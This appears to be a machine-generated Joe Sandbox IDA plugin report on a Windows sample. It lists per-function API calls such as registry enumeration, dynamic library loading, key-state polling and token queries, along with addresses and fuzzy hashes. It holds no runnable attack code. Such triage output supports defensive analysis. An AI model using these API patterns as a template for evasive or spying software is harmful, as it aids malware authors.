                                                                      • Opcode ID: e7eef5d11676522560c4c65236c1462d45712ee9d7fa3e7af6c3eb957d1a5fba
                                                                      • Instruction ID: 17b237b6cf45492068ea8dbddd3b600e7b79d6bc3f3f9486314c972ca23fbf68
                                                                      • Opcode Fuzzy Hash: e7eef5d11676522560c4c65236c1462d45712ee9d7fa3e7af6c3eb957d1a5fba
                                                                      • Instruction Fuzzy Hash: F3216D71200206BFEF104FA4DC84EBB7BADFB59768F104A29FA1893190D775DC59A760
                                                                      APIs
                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00576DBC
                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00576DEF
                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00576E01
                                                                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00576E3B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                       • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHandle$FilePipe
                                                                      • String ID: nul
                                                                      • API String ID: 4209266947-2873401336
                                                                      • Opcode ID: 6e118c5e72da7ade0273eaa51eb369db4b48b3cb94c5cc18199a53c861432b13
                                                                      • Instruction ID: f52cbf0f3ce87faa2bec100e00e8882b13423b9799354956da4a8cf44cc68eaf
                                                                      • Opcode Fuzzy Hash: 6e118c5e72da7ade0273eaa51eb369db4b48b3cb94c5cc18199a53c861432b13
                                                                      • Instruction Fuzzy Hash: 1621837460061AAFDB309F29EC04A9A7FF8FF54720F208A1AFDA4D72D0D7719954AB50
                                                                      APIs
                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00576E89
                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00576EBB
                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00576ECC
                                                                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00576F06
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                       • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHandle$FilePipe
                                                                      • String ID: nul
                                                                      • API String ID: 4209266947-2873401336
                                                                      • Opcode ID: 66d69e02bfc55e32f6e1efc360f3f31ce308ac3ee4676c2bb53de7971b22bbf7
                                                                      • Instruction ID: a13c1890bc5d606cc062b95c9fa4a76970e21108d3c583c2afdc44092003a855
                                                                      • Opcode Fuzzy Hash: 66d69e02bfc55e32f6e1efc360f3f31ce308ac3ee4676c2bb53de7971b22bbf7
                                                                      • Instruction Fuzzy Hash: F32195795007059BDF209F69EC08A5B7BACFF55720F208A1AFCA4D72D0D7709851E761
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0057AC54
                                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0057ACA8
                                                                      • __swprintf.LIBCMT ref: 0057ACC1
                                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,0059F910), ref: 0057ACFF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      Similarity
                                                                      • API ID: ErrorMode$InformationVolume__swprintf
                                                                      • String ID: %lu
                                                                      • API String ID: 3164766367-685833217
                                                                      APIs
                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0056FCED,?,00570D40,?,00008000), ref: 0057115F
                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0056FCED,?,00570D40,?,00008000), ref: 00571184
                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0056FCED,?,00570D40,?,00008000), ref: 0057118E
                                                                      • Sleep.KERNEL32(?,?,?,?,?,?,?,0056FCED,?,00570D40,?,00008000), ref: 005711C1
                                                                      Similarity
                                                                      • API ID: CounterPerformanceQuerySleep
                                                                      • String ID: @W
                                                                      • API String ID: 2875609808-3480940232
                                                                      APIs
                                                                      • CharUpperBuffW.USER32(?,?), ref: 00571B19
                                                                      Similarity
                                                                      • API ID: BuffCharUpper
                                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                      • API String ID: 3964851224-769500911
                                                                      APIs
                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0058EC07
                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0058EC37
                                                                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0058ED6A
                                                                      • CloseHandle.KERNEL32(?), ref: 0058EDEB
                                                                      Similarity
                                                                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                      • String ID:
                                                                      • API String ID: 2364364464-0
                                                                      Similarity
                                                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                      • String ID:
                                                                      • API String ID: 1559183368-0
                                                                      APIs
                                                                        • Part of subcall function 00517DE1: _memmove.LIBCMT ref: 00517E22
                                                                        • Part of subcall function 00590E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0058FDAD,?,?), ref: 00590E31
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005900FD
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0059013C
                                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00590183
                                                                      • RegCloseKey.ADVAPI32(?,?), ref: 005901AF
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 005901BC
                                                                      Similarity
                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                      • String ID:
                                                                      • API String ID: 3440857362-0
                                                                      APIs
                                                                        • Part of subcall function 00519837: __itow.LIBCMT ref: 00519862
                                                                        • Part of subcall function 00519837: __swprintf.LIBCMT ref: 005198AC
                                                                      • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0058D927
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0058D9AA
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0058D9C6
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0058DA07
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0058DA21
                                                                        • Part of subcall function 00515A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00577896,?,?,00000000), ref: 00515A2C
                                                                        • Part of subcall function 00515A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00577896,?,?,00000000,?,?), ref: 00515A50
                                                                      Similarity
                                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                      • String ID:
                                                                      • API String ID: 327935632-0
                                                                      APIs
                                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0057E61F
                                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0057E648
                                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0057E687
                                                                        • Part of subcall function 00519837: __itow.LIBCMT ref: 00519862
                                                                        • Part of subcall function 00519837: __swprintf.LIBCMT ref: 005198AC
                                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0057E6AC
                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0057E6B4
                                                                      Similarity
                                                                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                      • String ID:
                                                                      • API String ID: 1389676194-0
                                                                      APIs
                                                                      • GetCursorPos.USER32(?), ref: 00512357
                                                                      • ScreenToClient.USER32(005D57B0,?), ref: 00512374
                                                                      • GetAsyncKeyState.USER32(00000001), ref: 00512399
                                                                      • GetAsyncKeyState.USER32(00000002), ref: 005123A7
                                                                      Similarity
                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                      • String ID:
                                                                      • API String ID: 4210589936-0
                                                                      APIs
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005663E7
                                                                      • TranslateAcceleratorW.USER32(?,?,?), ref: 00566433
                                                                      • TranslateMessage.USER32(?), ref: 0056645C
                                                                      • DispatchMessageW.USER32(?), ref: 00566466
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00566475
                                                                      Similarity
                                                                      • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                      • String ID:
                                                                      • API String ID: 2108273632-0
                                                                      • Opcode ID: 00c5d1ef40eaf29e1608d8e97f65a80531c25414dc0ba7c2b5ececb95f4b77bd
                                                                      • Instruction ID: 683cbf6a740b75c8cea15e519ed1858567c9979181c5321277329bc2bb66ade8
                                                                      • Opcode Fuzzy Hash: 00c5d1ef40eaf29e1608d8e97f65a80531c25414dc0ba7c2b5ececb95f4b77bd
                                                                      • Instruction Fuzzy Hash: 3031A331A01646AFDF64CFB4DC84BB67FA8FB11341F240567E425C31A1EB25988DE761
                                                                      APIs
                                                                      • GetWindowRect.USER32(?,?), ref: 00568A30
                                                                      • PostMessageW.USER32(?,00000201,00000001), ref: 00568ADA
                                                                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00568AE2
                                                                      • PostMessageW.USER32(?,00000202,00000000), ref: 00568AF0
                                                                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00568AF8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePostSleep$RectWindow
                                                                      • String ID:
                                                                      • API String ID: 3382505437-0
                                                                      • Opcode ID: 85373b68dc222789fd1030f163c884cfb92b8ba2e35abbb1831d3622bdd89fe1
                                                                      • Instruction ID: d8cbb584d1ffaf9178591c09ce94e7c5dd078ca49699190bd79dd65a24c52a44
                                                                      • Opcode Fuzzy Hash: 85373b68dc222789fd1030f163c884cfb92b8ba2e35abbb1831d3622bdd89fe1
                                                                      • Instruction Fuzzy Hash: E431BC71500219EBDF14CFA8D94CAAE3BB5FB14325F10822AF925EB2D0CBB09954DB90
                                                                      APIs
                                                                      • IsWindowVisible.USER32(?), ref: 0056B204
                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0056B221
                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0056B259
                                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0056B27F
                                                                      • _wcsstr.LIBCMT ref: 0056B289
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                      • String ID:
                                                                      • API String ID: 3902887630-0
                                                                      • Opcode ID: 36b925fa203deaa03e4ae975dc185e6effd025384f310f815ce75d43eb1a70b3
                                                                      • Instruction ID: b5478cfe72752a05ddcbeddec9a2460bc61a7b3f7a4f9c71c21dee6cde8d6691
                                                                      • Opcode Fuzzy Hash: 36b925fa203deaa03e4ae975dc185e6effd025384f310f815ce75d43eb1a70b3
                                                                      • Instruction Fuzzy Hash: 8921D3762042017AFB155B75DC59A7F7FECEB89710F00412AF805DA1A1EF619C80A360
                                                                      APIs
                                                                        • Part of subcall function 00512612: GetWindowLongW.USER32(?,000000EB), ref: 00512623
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0059B192
                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0059B1B7
                                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0059B1CF
                                                                      • GetSystemMetrics.USER32(00000004), ref: 0059B1F8
                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00580E90,00000000), ref: 0059B216
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long$MetricsSystem
                                                                      • String ID:
                                                                      • API String ID: 2294984445-0
                                                                      • Opcode ID: 93c37e356cae017e758a5c2917c6874ba190527cb91f190e3098ea5b5a6f4943
                                                                      • Instruction ID: d4bd65e6781b4876db75d7df6ef708207678f642c8d7eeea44f87a3cc1599ff5
                                                                      • Opcode Fuzzy Hash: 93c37e356cae017e758a5c2917c6874ba190527cb91f190e3098ea5b5a6f4943
                                                                      • Instruction Fuzzy Hash: 4B219471611655AFEF209F38ED44A6A3FA4FB15361F254725F932D71E0E7309810EB90
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00569320
                                                                        • Part of subcall function 00517BCC: _memmove.LIBCMT ref: 00517C06
                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00569352
                                                                      • __itow.LIBCMT ref: 0056936A
                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00569392
                                                                      • __itow.LIBCMT ref: 005693A3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$__itow$_memmove
                                                                      • String ID:
                                                                      • API String ID: 2983881199-0
                                                                      • Opcode ID: 022d7fbcfec9563231920c258cfcfd1793e3f5dccc91b6280df321f76127c845
                                                                      • Instruction ID: e2826e73a2ebdf55e71c86ac49dc878ba06f28bbc7daf12dcf4260d2f0de141e
                                                                      • Opcode Fuzzy Hash: 022d7fbcfec9563231920c258cfcfd1793e3f5dccc91b6280df321f76127c845
                                                                      • Instruction Fuzzy Hash: B3210431700209BBDB10AB64DC89EEE3FACFBC8710F044425F905DB2D0E6B08D959791
                                                                      APIs
                                                                      • IsWindow.USER32(00000000), ref: 00585A6E
                                                                      • GetForegroundWindow.USER32 ref: 00585A85
                                                                      • GetDC.USER32(00000000), ref: 00585AC1
                                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 00585ACD
                                                                      • ReleaseDC.USER32(00000000,00000003), ref: 00585B08
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ForegroundPixelRelease
                                                                      • String ID:
                                                                      • API String ID: 4156661090-0
                                                                      • Opcode ID: fbf031f8a90d4a1bf992d9d3b57ccee5687b039d53eb58d11440e3046fe9675f
                                                                      • Instruction ID: 1bf9cbbbc2b2059d679403af0fd3227399b10da013a2529200c90353da47f77b
                                                                      • Opcode Fuzzy Hash: fbf031f8a90d4a1bf992d9d3b57ccee5687b039d53eb58d11440e3046fe9675f
                                                                      • Instruction Fuzzy Hash: F821A435A00204AFD704EF65DC89AAABBE5FF98311F158479F80AD7352DA30AD44DB90
                                                                      APIs
                                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0051134D
                                                                      • SelectObject.GDI32(?,00000000), ref: 0051135C
                                                                      • BeginPath.GDI32(?), ref: 00511373
                                                                      • SelectObject.GDI32(?,00000000), ref: 0051139C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                      • String ID:
                                                                      • API String ID: 3225163088-0
                                                                      • Opcode ID: 86b51d977a18d1a3c75b844ad378deff40bc5ce1c88c35159f8ec208e5562b07
                                                                      • Instruction ID: 55de3a163487c6baf56a27d0ae5fe209109030f806a62a3e8d884e8b47a1c05d
                                                                      • Opcode Fuzzy Hash: 86b51d977a18d1a3c75b844ad378deff40bc5ce1c88c35159f8ec208e5562b07
                                                                      • Instruction Fuzzy Hash: DF216230801A08DFEB209F25DC087A97FA8FB20311F244657F521961B4E7709899FF94
                                                                      APIs
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00574ABA
                                                                      • __beginthreadex.LIBCMT ref: 00574AD8
                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 00574AED
                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00574B03
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00574B0A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                      • String ID:
                                                                      • API String ID: 3824534824-0
                                                                      • Opcode ID: 9074b030c2b259d49e0552dcd6a3c39235d173533b06e73d87366f5a6d5b079d
                                                                      • Instruction ID: 5c4282c522a2f4373c1bf119f7b8844e8614221c6e0156a6e0a1057c812dd46e
                                                                      • Opcode Fuzzy Hash: 9074b030c2b259d49e0552dcd6a3c39235d173533b06e73d87366f5a6d5b079d
                                                                      • Instruction Fuzzy Hash: 71110876905214BBCB118FA8EC08A9B7FACFB55321F158267F818D3250D775CD08ABA0
                                                                      APIs
                                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0056821E
                                                                      • GetLastError.KERNEL32(?,00567CE2,?,?,?), ref: 00568228
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00567CE2,?,?,?), ref: 00568237
                                                                      • HeapAlloc.KERNEL32(00000000,?,00567CE2,?,?,?), ref: 0056823E
                                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00568255
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 842720411-0
                                                                      • Opcode ID: fc1347762af5995aa69a74354c4a4f9cdc15cc73b750e4170628c34ae04d75a2
                                                                      • Instruction ID: df56d572691bc2c5b4e7dd3c922eea777824deae7b403fdc6bf2317385191833
                                                                      • Opcode Fuzzy Hash: fc1347762af5995aa69a74354c4a4f9cdc15cc73b750e4170628c34ae04d75a2
                                                                      • Instruction Fuzzy Hash: D40169B5204204BFDB204FA6DC48D7B7FADFF9A755B60052AF809C3220DA318C44EBA0
                                                                      APIs
                                                                      • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567044,80070057,?,?,?,00567455), ref: 00567127
                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567044,80070057,?,?), ref: 00567142
                                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567044,80070057,?,?), ref: 00567150
                                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567044,80070057,?), ref: 00567160
                                                                      • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567044,80070057,?,?), ref: 0056716C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 3897988419-0
                                                                      • Opcode ID: 2868a8197fa6f7794e386ff75a6418700638ae5aa5f9d3d458837f79806ec638
                                                                      • Instruction ID: 469b1248ea086845965632228962d064fe2edbe7d4f406f87524386be60388df
                                                                      • Opcode Fuzzy Hash: 2868a8197fa6f7794e386ff75a6418700638ae5aa5f9d3d458837f79806ec638
                                                                      • Instruction Fuzzy Hash: 2D017CB2601208ABDB114F64DC44AAA7FADFB49795F1501A6FD04D3220D771DD41EBA0
                                                                      APIs
                                                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00575260
                                                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0057526E
                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00575276
                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00575280
                                                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 005752BC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                      • String ID:
                                                                      APIs
                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00568121
                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0056812B
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0056813A
                                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00568141
                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00568157
                                                                      Similarity
                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                      • String ID:
                                                                      APIs
